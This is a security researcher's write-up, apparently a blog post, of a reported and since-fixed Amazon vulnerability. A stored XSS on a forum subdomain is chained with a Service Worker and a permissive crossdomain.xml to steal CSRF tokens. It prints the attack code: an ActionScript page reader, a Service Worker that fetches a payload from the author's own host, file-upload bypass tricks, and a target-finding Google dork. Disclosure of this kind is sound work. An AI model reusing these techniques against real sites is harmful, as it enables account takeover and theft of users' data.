Hello all, today I have some free time, so I am going to tell you about my finding at Amazon that could lead to full account takeover.

Introduction

First,

let’s talk about Amazon as biggest e-commerce in the world, and when I say e-commerce that means a lot of money in one place. It has like more than 340k employees. For this the security of the website should be a big deal, but it has a security web page that tells you to report bugs for them for free, so I can tell you the long story short. It says report security issues to us and make the product more secure and get nothing, not even a simple credit like hall of fame or a shirt!

These days I don’t do a lot of bug hunting, but when I do I make sure that I am not wasting my time and my energy in writing a good report with full PoC, not a theoretical attack, and only a good serviety vulnerabilities.

I was working on private bug bounty program when I found something interesting. It is using a 3rd party service called Answerhub, and if you check my blog you will find out that I found a vulnerability there before, so it isn’t impossible to find new one. I started working on upload functionality, since I already found my previous finding there you can read about it here How I Hacked Oculus OAuth +Ebay +IBM.

However, I knew what I was looking for, so I didn’t take much time to find something very cool there. I was able to create stored XSS using file upload. The domain itself was Out-Of-Scope, but I wrote some JS code that affects another In-Scope domain, Therefore they rewarded me with $1250 bounty for the great PoC.

On other hand I found out that Amazon is using the same 3rd party service (AnswerHub) and I had an idea because crossdomain.xml of Amazon is very permissive, so if I found a way to upload SWF file in Amazon sub-domain I can steal data from the main domain. One thing is that it doesn’t allow any flash content to be uploaded. Now we will come the the fun part and finish the boring introduction.

Technical Details

As the title of the article is very interesting, and most of you come here to read about the method and not interested in the story, today is your lucky day. I am going to write everything you wonder about, so let’s get started.

I was looking for big companies that they are using the AnswerHub service using this Google dork:

inurl:/questions/ask.html inurl:https://

I got very good results and started digging in the best places. I saw Amazon and the thought of crossdomain.xml just pop up into my mind, so I said let’s give it a try.

Here is crossdomain.xml of Amazon :

amazon

My target was gamedev.amazon.com I was able to upload XML file(SVG), which can make a stored XSS. But, this isn’t what I am looking for, so I tried every trick I know to upload SWF file there, but to no avail :(

Thinking outside the box

I didn’t get anything with SWF upload I was thinking in what I already have(XSS). I got a really good idea. I said what if I upload SVG file and JS file that trigger a Service Worker on this domain!

Let me tell you about Service Worker API (Google Chrome):

A service worker is a script that your browser runs in the background, separate from a web page, opening the door to features that don’t need a web page or user interaction. Today, they already include features like push notifications and background sync. In the future, service
workers will support other things like periodic sync or geofencing. The core feature discussed in this tutorial is the ability to intercept and handle network requests, including programmatically managing a cache of responses.

The reason this is such an exciting API is that it allows you to support offline experiences, giving developers complete control over the experience.

You didn’t understand anything? neither do I, so I will explain it more now.

For more information about SW which I really like. You can read more about it here.

So now let me write my theory of this attack and each file code to short:


1- Write AS code that will send an HTTPs request to amazon.com and receive the page content, and find the CSRF token in the page. Here is what I wrote.

import flash.external.*;
import flash.net.*;

(function () {

	var loader = new URLLoader(new URLRequest("https://www.amazon.com/Hacking-Art-Exploitation-Jon-Erickson/dp/1593271441/"));
    
	loader.addEventListener("complete", loaderCompleted);
    
	function loaderCompleted(event) {
    
	ExternalInterface.call("alert", event.target.data.slice(189270,189335));

	}
})();

This file was hosted on my website ahussam.me it’ll be used later. It’s name is myexp.as and I used flex SDK to generate the SWF version of the code. I also created a PHP script to generate SWF file from AS code I will publish it in my Github account soon.



2- The JS file that will be registered as a SW for the site, and make me able to proxy the traffic and create SWF file response on this path.

var url = "https://ahussam.me/myexp.swf"
onfetch = (e) => {
  e.respondWith(fetch(url);
}

This code could install the SW that is an SWF file(myexp.swf) on this path, which will grap the CSRF tokens from the main website. Thanks crossdomain.xml :)

I uploaded it first so I can get the new name, since the filename will be change after uploading. I renamed it as sw.txt becuase there are a clinet side check for the extension. And I used the old trick of changing the content-type. After the uploading the filename became 4837-sw.txt. Here is the HTTP request

amazon


3- The html page that will regesiter the SW that’s a SVG file with xml and JS. Here is the JS code:

if ('serviceWorker' in navigator) {
// 4837-sw.txt is the previous file. 
navigator.serviceWorker.register('4837-sw.txt').then(_=>location=1337);	
}

Like what I did before, I changed the file extension and the content-type, and here is the HTTP request:

amazon

Here is our PoC: https://gamedev.amazon.com/forums/storage/attachments/4937-svg.txt

The exploit didn’t work in the first time(I was using HTTP and SW only works in HTTPS. If you don’t have https website for your SWF file you can use data URI and base64 in fetch function), but after some debugging it worked!

amazon


I reported it to Amazon team. They weren’t able to reproduce the PoC because it was long report. And gamedev team deleted my PoC and blocked me!
So I made a PoC video. They weren’t able to watch it first but I re-uploaded it and they were able to reproduce the vulnerability.

After months of waiting, they didn’t reply my message, and I found that the bug was fixed. So I wrote a long message telling them that I am really pissed off of how they handle security reports and when they reply with automatic message it’s really disrespect for me and to everyone who wasting his time make the web a better place and secteam doesn’t have time to write simple “Thanks!”. I got this message after a while :

Hi Abdullah,

I apologise for the delay in getting back to you and the lack of confirmation whether this issue was fixed. It has been addressed by the service team; I would like to pass along their thanks, as well as my own, for discovering this issue.

Presently, we do not participate in a bug bounty program or offer rewards for security research. However, I understand your desire for a more dynamic and immediate reward system for reported security concerns. We will incorporate this feedback as we continue to improve our security issue response process.

We look forward to hearing more from you and working together to protect AWS customers. Thank you for your time, consideration, and sharing our passion for security.

Best Regards

XXXXXXX XXX.
AWS Security
https://aws.amazon.com/security

Conclusion

Since I was able to steal CSRF tokens there was a way to change the user phone number and that could lead to full account takeover. Much more things can be done not only CSRF, but also information leaking, Oauth approving, address disclosure…etc.

Note2self: No more free bugs ;)

I hope you enjoyed the write-up and learned something. Thanks for reading.

Something maybe I should mention here. This method had been used in Cure53 XSSmas challenge before not the same but very close to it.